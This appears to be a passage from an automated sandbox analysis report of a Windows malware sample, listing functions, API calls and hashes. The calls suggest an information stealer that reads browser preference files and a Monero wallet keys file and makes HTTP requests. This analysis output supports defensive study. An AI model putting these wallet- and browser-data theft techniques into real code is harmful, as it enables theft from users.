                        control_flow_graph 1450 276af3 1451 276b0a 1450->1451 1453 276b0c-276b22 call 276920 call 275b10 CloseHandle ExitProcess 1451->1453 1454 276aba-276ad7 call 27aad0 OpenEventA 1451->1454 1459 276af5-276b04 CloseHandle Sleep 1454->1459 1460 276ad9-276af1 call 27aad0 CreateEventA 1454->1460 1459->1451 1460->1453
                        APIs
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E29170,?,0028110C,?,00000000,?,00281110,?,00000000,00280AEF), ref: 00276ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00276AE8
                        • CloseHandle.KERNEL32(00000000), ref: 00276AF9
                        • Sleep.KERNEL32(00001770), ref: 00276B04
                        • CloseHandle.KERNEL32(?,00000000,?,00E29170,?,0028110C,?,00000000,?,00281110,?,00000000,00280AEF), ref: 00276B1A
                        • ExitProcess.KERNEL32 ref: 00276B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                        • String ID:
                        • API String ID: 941982115-0
                        • Opcode ID: 551420b28bdb8899f3ca3a3b3409e0ad8666b5d2142a1568b228613ed9b8974a
                        • Instruction ID: 78784e1026ca62c51d3ddf755743518c9c1c7254602c1c615abca77fdec82ff1
                        • Opcode Fuzzy Hash: 551420b28bdb8899f3ca3a3b3409e0ad8666b5d2142a1568b228613ed9b8974a
                        • Instruction Fuzzy Hash: 1DF05E3096061AAFE700ABA0DC0ABBE7B34FB05705F10C524B50AA51C1CBF05560DE6A
                        Function 002647B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00264839
                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00264849
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1274457161-4251816714
                        • Opcode ID: d21ba7cd44d86ed17032b23685d6342006e595e0f6327f46412c5994a2e28104
                        • Instruction ID: 82c0710153e48a27c9584a2bf2e184bc04373ab97f6599c533bc74f08b697395
                        • Opcode Fuzzy Hash: d21ba7cd44d86ed17032b23685d6342006e595e0f6327f46412c5994a2e28104
                        • Instruction Fuzzy Hash: AD214FB5D00209ABDF14DFA4E845ADE7B75FB45320F108625F929A72C1EB706A15CF82
                        Function 002751F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                          • Part of subcall function 00266280: InternetOpenA.WININET(00280DFE,00000001,00000000,00000000,00000000), ref: 002662E1
                          • Part of subcall function 00266280: StrCmpCA.SHLWAPI(?,00E2EA78), ref: 00266303
                          • Part of subcall function 00266280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00266335
                          • Part of subcall function 00266280: HttpOpenRequestA.WININET(00000000,GET,?,00E2DE60,00000000,00000000,00400100,00000000), ref: 00266385
                          • Part of subcall function 00266280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002663BF
                          • Part of subcall function 00266280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002663D1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00275228
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                        • String ID: ERROR$ERROR
                        • API String ID: 3287882509-2579291623
                        • Opcode ID: be087de94e7c9b05c5b3be31f60b972418e40641b30777920bef42a1de9575e8
                        • Instruction ID: 6146604f8abd2727b8776d895de40410f2668244b7b63afe6dea7fd66cb0e372
                        • Opcode Fuzzy Hash: be087de94e7c9b05c5b3be31f60b972418e40641b30777920bef42a1de9575e8
                        • Instruction Fuzzy Hash: 6E11EF30930148A6CB14FF74DD52AED7778AF90310F808168F81E5A592EF746B26CF96
                        Function 002778E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00277910
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00277917
                        • GetComputerNameA.KERNEL32(?,00000104), ref: 0027792F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: af2bdd04d571d6b243edf45295aed15c937901b780d24468494973578043c3dd
                        • Instruction ID: cf25fbfb8fe9da6fd21f27a4ddcda53a776f69dd0b11d49d8e0d1c0f39c008fd
                        • Opcode Fuzzy Hash: af2bdd04d571d6b243edf45295aed15c937901b780d24468494973578043c3dd
                        • Instruction Fuzzy Hash: 870186B1915205EBC700DF94DD45BAABBB8FB05B11F104229F645E3280C3785914CBA2
                        Function 00261110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0026112B
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00261132
                        • ExitProcess.KERNEL32 ref: 00261143
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AllocCurrentExitNumaVirtual
                        • String ID:
                        • API String ID: 1103761159-0
                        • Opcode ID: aa1c7e72efe842cbecb6f3a807516ff979c0ddc39882f246f44a00472261cc45
                        • Instruction ID: 391483ec326bd2ed3834141aceebbf8a8de35e2d3eab6315021b7ffe1255eaa2
                        • Opcode Fuzzy Hash: aa1c7e72efe842cbecb6f3a807516ff979c0ddc39882f246f44a00472261cc45
                        • Instruction Fuzzy Hash: 41E0E670955308FFE7506BA09D0AB1D7A78AB05B01F504054F709B61D0D7B56A60DA9D
                        Function 002610A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 002610B3
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 002610F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: a3570561103b4cb47c4b7b208b816628e68cd1386ed1a29ed7a86061ba491a70
                        • Instruction ID: 1fda90b527a63778324330d8c176fda760a3728e7f196fbebb219c753f2b40bb
                        • Opcode Fuzzy Hash: a3570561103b4cb47c4b7b208b816628e68cd1386ed1a29ed7a86061ba491a70
                        • Instruction Fuzzy Hash: DAF0E971641204BBEB149AA49C49FBBB7D8D705715F300458F904E7280D671AE54CA54
                        Function 00261190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00277910
                          • Part of subcall function 002778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00277917
                          • Part of subcall function 002778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0027792F
                          • Part of subcall function 00277850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002611B7), ref: 00277880
                          • Part of subcall function 00277850: RtlAllocateHeap.NTDLL(00000000), ref: 00277887
                          • Part of subcall function 00277850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0027789F
                        • ExitProcess.KERNEL32 ref: 002611C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                        • String ID:
                        • API String ID: 3550813701-0
                        • Opcode ID: c045db4c2516daf9172d47dd6147123e6b163b3298c7eec93a6801258b615389
                        • Instruction ID: e2461ce57f54f8b519532e9c83c9fd477a0135bc6122d4c78c638b1d6b1dd066
                        • Opcode Fuzzy Hash: c045db4c2516daf9172d47dd6147123e6b163b3298c7eec93a6801258b615389
                        • Instruction Fuzzy Hash: E3E0ECA596420253CB0077B0AC0AB2A369C5B16345F084434BA0D92542FA39F870D96A

                        Non-executed Functions

                        Function 002738B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 002738CC
                        • FindFirstFileA.KERNEL32(?,?), ref: 002738E3
                        • lstrcat.KERNEL32(?,?), ref: 00273935
                        • StrCmpCA.SHLWAPI(?,00280F70), ref: 00273947
                        • StrCmpCA.SHLWAPI(?,00280F74), ref: 0027395D
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00273C67
                        • FindClose.KERNEL32(000000FF), ref: 00273C7C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 1125553467-2524465048
                        • Opcode ID: 460cb97b8f5bce807856cc52b4c3bc26d8672aed5bfe37841bbfa2d4e2ec262a
                        • Instruction ID: fb3908dc84e325511377773689372ea2c324511e6faa1fd427051366d5079172
                        • Opcode Fuzzy Hash: 460cb97b8f5bce807856cc52b4c3bc26d8672aed5bfe37841bbfa2d4e2ec262a
                        • Instruction Fuzzy Hash: 83A174B19102199BDB64EF64CC85FEE7778BF49300F048598E60D96181EB749BA4CF62
                        Function 00274910 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 172fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 0027492C
                        • FindFirstFileA.KERNEL32(?,?), ref: 00274943
                        • StrCmpCA.SHLWAPI(?,00280FDC), ref: 00274971
                        • StrCmpCA.SHLWAPI(?,00280FE0), ref: 00274987
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00274B7D
                        • FindClose.KERNEL32(000000FF), ref: 00274B92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s$%s\%s$%s\*$(
                        • API String ID: 180737720-1975300440
                        • Opcode ID: a71edaa46a60bcd08417de827447ad33041c8c3410f567be8144d6ae7420fb22
                        • Instruction ID: 912ce0247b3b45c4521c01d78fe222c724c06a7da759d36d1d44988ef6571c38
                        • Opcode Fuzzy Hash: a71edaa46a60bcd08417de827447ad33041c8c3410f567be8144d6ae7420fb22
                        • Instruction Fuzzy Hash: A96167B5910218ABCB60FFA0DC85EEA777CBB49700F048598B60D96140EF74EBA5CF95
                        Function 0026BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                        • FindFirstFileA.KERNEL32(00000000,?,00280B32,00280B2B,00000000,?,?,?,002813F4,00280B2A), ref: 0026BEF5
                        • StrCmpCA.SHLWAPI(?,002813F8), ref: 0026BF4D
                        • StrCmpCA.SHLWAPI(?,002813FC), ref: 0026BF63
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0026C7BF
                        • FindClose.KERNEL32(000000FF), ref: 0026C7D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 3334442632-726946144
                        • Opcode ID: 2f9eec7a44fe343372f1ceda5dddc94c492305cda074f782b071b023859759f1
                        • Instruction ID: 4d98d49100e8fccc1ddfe80929056de65d120450ba69c573101a2886a02e8995
                        • Opcode Fuzzy Hash: 2f9eec7a44fe343372f1ceda5dddc94c492305cda074f782b071b023859759f1
                        • Instruction Fuzzy Hash: FD4254729201049BCB14FB70DD96EEE737CAF94310F408568B90E96181EF34AB69CF96
                        Function 00274570 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 137stringmemoryfileCOMMON
                        Download Yara Rule
                        APIs
